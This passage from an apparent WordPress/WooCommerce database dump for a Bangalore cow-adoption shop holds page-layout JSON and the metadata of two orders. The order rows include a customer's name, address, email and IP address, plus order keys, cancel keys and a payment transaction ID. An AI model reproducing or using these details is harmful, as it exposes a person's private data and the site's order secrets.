:{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11984,1986,'_elementor_page_assets','a:0:{}'),(11987,1988,'_order_key','wc_order_MK1bMc5HidQrI'),(11988,1988,'_customer_user','1'),(11989,1988,'_payment_method','cod'),(11990,1988,'_payment_method_title','Cash on delivery'),(11991,1988,'_customer_ip_address','115.99.181.60'),(11992,1988,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36'),(11993,1988,'_created_via','checkout'),(11994,1988,'_cart_hash','717b506b4b4cfc85039dc7848a919599'),(11995,1988,'_billing_first_name','bavani'),(11996,1988,'_billing_last_name','p'),(11997,1988,'_billing_address_1','800 ,spandana towers'),(11998,1988,'_billing_address_2','hsr layout'),(11999,1988,'_billing_city','bangalore'),(12000,1988,'_billing_state','KA'),(12001,1988,'_billing_postcode','560078'),(12002,1988,'_billing_country','IN'),(12003,1988,'_billing_email','mango@homedirect.in'),(12004,1988,'_billing_phone','123456'),(12005,1988,'_shipping_first_name','bavani'),(12006,1988,'_shipping_last_name','p'),(12007,1988,'_shipping_address_1','800 ,spandana towers'),(12008,1988,'_shipping_address_2','hsr layout'),(12009,1988,'_shipping_city','bangalore'),(12010,1988,'_shipping_state','KA'),(12011,1988,'_shipping_postcode','560078'),(12012,1988,'_shipping_country','IN'),(12013,1988,'_order_currency','INR'),(12014,1988,'_cart_discount','0'),(12015,1988,'_cart_discount_tax','0'),(12016,1988,'_order_shipping','0'),(12017,1988,'_order_shipping_tax','0'),(12018,1988,'_order_tax','0'),(12019,1988,'_order_total','42000.00'),(12020,1988,'_order_version','7.0.0'),(12021,1988,'_prices_include_tax','no'),(12022,1988,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN mango@homedirect.in 123456'),(12023,1988,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN '),(12025,1988,'_wc_cancel_key','82ebe752e47ed0043a798bc4bb4062b8'),(12026,1988,'_wcfmmp_order_processed','yes'),(12027,1988,'is_magic_checkout_order','no'),(12031,1988,'is_vat_exempt','no'),(12032,1988,'_download_permissions_granted','yes'),(12033,1988,'_recorded_sales','yes'),(12034,1988,'_recorded_coupon_usage_counts','yes'),(12035,1988,'_order_stock_reduced','yes'),(12036,1988,'_wcfm_new_order_notified','yes'),(12037,1988,'_wcfm_membership_order_processed','yes'),(12038,1988,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(12039,1988,'_wcpdf_invoice_date','1666873458'),(12040,1988,'_wcpdf_invoice_date_formatted','2022-10-27 17:54:18'),(12041,1988,'_wcpdf_invoice_number','12'),(12042,1988,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:12;s:16:\"formatted_number\";s:2:\"12\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1988;s:7:\"padding\";N;}'),(12043,1988,'_new_order_email_sent','true'),(12044,1988,'_wcfmmp_order_email_triggered','yes'),(12045,1989,'_order_key','wc_order_nfomStFNJjVRz'),(12046,1989,'_customer_user','1'),(12047,1989,'_payment_method','razorpay'),(12048,1989,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(12049,1989,'_customer_ip_address','115.99.181.60'),(12050,1989,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36'),(12051,1989,'_created_via','checkout'),(12052,1989,'_cart_hash','e4283abb8e2314d75457e0b5ab17ad62'),(12053,1989,'_billing_first_name','bavani'),(12054,1989,'_billing_last_name','p'),(12055,1989,'_billing_address_1','800 ,spandana towers'),(12056,1989,'_billing_address_2','hsr layout'),(12057,1989,'_billing_city','bangalore'),(12058,1989,'_billing_state','KA'),(12059,1989,'_billing_postcode','560078'),(12060,1989,'_billing_country','IN'),(12061,1989,'_billing_email','mango@homedirect.in'),(12062,1989,'_billing_phone','123456'),(12063,1989,'_shipping_first_name','bavani'),(12064,1989,'_shipping_last_name','p'),(12065,1989,'_shipping_address_1','800 ,spandana towers'),(12066,1989,'_shipping_address_2','hsr layout'),(12067,1989,'_shipping_city','bangalore'),(12068,1989,'_shipping_state','KA'),(12069,1989,'_shipping_postcode','560078'),(12070,1989,'_shipping_country','IN'),(12071,1989,'_order_currency','INR'),(12072,1989,'_cart_discount','0'),(12073,1989,'_cart_discount_tax','0'),(12074,1989,'_order_shipping','0'),(12075,1989,'_order_shipping_tax','0'),(12076,1989,'_order_tax','0'),(12077,1989,'_order_total','21000.00'),(12078,1989,'_order_version','7.0.0'),(12079,1989,'_prices_include_tax','no'),(12080,1989,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN mango@homedirect.in 123456'),(12081,1989,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN '),(12082,1989,'is_vat_exempt','no'),(12083,1989,'_wc_cancel_key','a35c9301329403251bfb9fa30cb62713'),(12084,1989,'_wcfmmp_order_processed','yes'),(12085,1989,'is_magic_checkout_order','no'),(12086,1989,'_transaction_id','pay_KZ3RVX7gDlmP90'),(12087,1989,'_date_paid','1666930167'),(12088,1989,'_paid_date','2022-10-28 09:39:27'),(12089,1989,'_download_permissions_granted','yes'),(12090,1989,'_recorded_sales','yes'),(12091,1989,'_recorded_coupon_usage_counts','yes'),(12092,1989,'_order_stock_reduced','yes'),(12093,1989,'_wcfm_new_order_notified','yes'),(12094,1989,'_wcfm_membership_order_processed','yes'),(12095,1989,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(12096,1989,'_wcpdf_invoice_date','1666930167'),(12097,1989,'_wcpdf_invoice_date_formatted','2022-10-28 09:39:27'),(12098,1989,'_wcpdf_invoice_number','13'),(12099,1989,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:13;s:16:\"formatted_number\";s:2:\"13\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1989;s:7:\"padding\";N;}'),(12100,1989,'_new_order_email_sent','true'),(12101,1989,'_wcfmmp_order_email_triggered','yes'),(12102,1990,'_elementor_edit_mode','builder'),(12103,1990,'_elementor_template_type','wp-page'),(12104,1990,'_elementor_version','3.7.8'),(12105,1990,'_wp_page_template','elementor_canvas'),(12106,1990,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 